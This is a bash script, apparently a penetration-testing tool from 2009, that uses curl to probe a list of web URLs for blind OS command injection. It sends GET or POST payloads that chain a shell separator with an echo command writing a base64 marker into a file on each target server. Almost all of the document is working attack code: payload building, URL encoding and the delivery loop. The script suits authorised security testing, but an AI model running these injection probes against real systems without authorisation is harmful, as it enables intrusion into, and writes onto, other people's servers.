CURL: command_injection_test.sh
Wednesday, 23 September 2009 19:54
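#!/bin/bash
#
# command_injection_test.sh - blind OS command injection probe driven by curl.
#
# For every target listed in URLFILE, send a payload that - if the parameter
# is passed unescaped to a shell on the server - appends a base64-encoded
# copy of the URL line to OUTPUTFILE on the target host. Afterwards, read
# OUTPUTFILE on the target and base64-decode each line to learn which URLs
# were injectable.
#
# The PASS/FAIL printed per line only says whether curl could deliver the
# request (exit 0, i.e. no transport error and, because of -f, no HTTP 4xx/5xx).
# It does NOT indicate whether the injection worked; only OUTPUTFILE does.
#
# Only run this against systems you are authorised to test, and delete
# OUTPUTFILE from the target when the engagement is over.

set -u -o pipefail

CURL=/usr/bin/curl

# Temporary output file on the target web server - ensure that the web
# application has permission to write to this location.
OUTPUTFILE='C:\temp\vulns.txt'
# OUTPUTFILE=/tmp/vulns.txt

# A file with URLs to attack, one per line. Blank lines and lines starting
# with '#' are skipped.
#   GET:  http://HOST:PORT/PATH?PARAM=      (payload is appended to the URL)
#   POST: http://HOST:PORT/PATH PARAM       (URL, one space, form field name)
URLFILE=urls.txt

# Command separator, percent-encoded as it would appear in a URL.
# Windows: & (%26)   UNIX: ; (%3B)
COMMAND_SEPARATOR=%26
# COMMAND_SEPARATOR=%3B

#######################################
# Percent-encode a string for use as a URL query value.
# RFC 3986 unreserved characters pass through; every other byte becomes %XX.
# Arguments: $1 - string to encode (ASCII payloads; other bytes are
#                 encoded byte-wise under the C locale)
# Outputs:   encoded string on stdout, no trailing newline
#######################################
urlencode() {
  local LC_ALL=C
  local s=$1 out='' c i
  for (( i = 0; i < ${#s}; i++ )); do
    c=${s:i:1}
    case "$c" in
      [A-Za-z0-9._~-]) out+=$c ;;
      # "'c" makes printf emit the byte value of the character.
      *) printf -v out '%s%%%02X' "$out" "'$c" ;;
    esac
  done
  printf '%s' "$out"
}

#######################################
# Percent-decode a string, e.g. %26 -> '&', %3B -> ';'.
# Arguments: $1 - percent-encoded string
# Outputs:   decoded string on stdout, no trailing newline
#######################################
urldecode() {
  local s=${1//+/ }
  # %b interprets \xHH escapes, so rewrite every %HH into \xHH first.
  printf '%b' "${s//%/\\x}"
}

#######################################
# Base64-encode a string on ONE line.
# MIME::Base64's default inserts a newline every 76 characters, which would
# split the payload; passing '' as the end-of-line string disables that.
# Arguments: $1 - string to encode
# Outputs:   base64 text on stdout, no line breaks, no trailing newline
#######################################
b64() {
  printf '%s' "$1" | perl -MMIME::Base64 -0777 -ne 'print encode_base64($_, "")'
}

#######################################
# Read URLFILE and send one injection attempt per line.
# Globals:  CURL, OUTPUTFILE, URLFILE, COMMAND_SEPARATOR (all read)
# Outputs:  one "PASS:"/"FAIL:" line per target on stdout (curl's response
#           body, if any, is also written to stdout as before)
# Returns:  exits 1 if URLFILE is unreadable or CURL is not executable
#######################################
main() {
  local line url field payload sep rc

  if [[ ! -r "$URLFILE" ]]; then
    printf 'ERROR: cannot read URL file %s\n' "$URLFILE" >&2
    exit 1
  fi
  if [[ ! -x "$CURL" ]]; then
    printf 'ERROR: curl not found at %s\n' "$CURL" >&2
    exit 1
  fi

  # Plain-text separator; the percent-encoded form is only right for GET.
  sep=$(urldecode "$COMMAND_SEPARATOR")

  # IFS= / -r keep the line byte-exact; the || clause handles a last line
  # that has no trailing newline.
  while IFS= read -r line || [[ -n "$line" ]]; do
    [[ -z "$line" || "$line" == \#* ]] && continue

    # A space in the line means "URL PARAM" (POST); otherwise the whole
    # line is the GET URL.
    url=${line% *}
    field=${line#* }

    # Plain (not percent-encoded) payload. The base64 marker identifies the
    # URL in OUTPUTFILE afterwards and contains no shell metacharacters.
    payload=" ${sep} echo $(b64 "$line") >> ${OUTPUTFILE} ${sep} "

    rc=0
    if [[ "$url" != "$line" ]]; then
      # POST: multipart/form-data values are delivered verbatim - servers
      # do not percent-decode them - so send the plain payload.
      # --form-string (not -F) keeps curl from interpreting a leading '@'
      # or '<' or a ';type=' suffix inside the value (a ';' separator
      # would otherwise be eaten by curl itself).
      "$CURL" -f -s --form-string "${field}=${payload}" "$url" || rc=$?
    else
      # GET: the payload lands in the query string, so percent-encode the
      # whole thing - including the base64's '+', '/' and '=' which would
      # otherwise be mangled by the server's query parser.
      "$CURL" -f -s "${url}$(urlencode "$payload")" || rc=$?
    fi

    # Non-zero means curl failed or (with -f) the server returned >= 400.
    if (( rc != 0 )); then
      printf 'FAIL: (curl %d) %s\n' "$rc" "$line"
    else
      printf 'PASS: (curl %d) %s\n' "$rc" "$line"
    fi
  done < "$URLFILE"
}

main "$@"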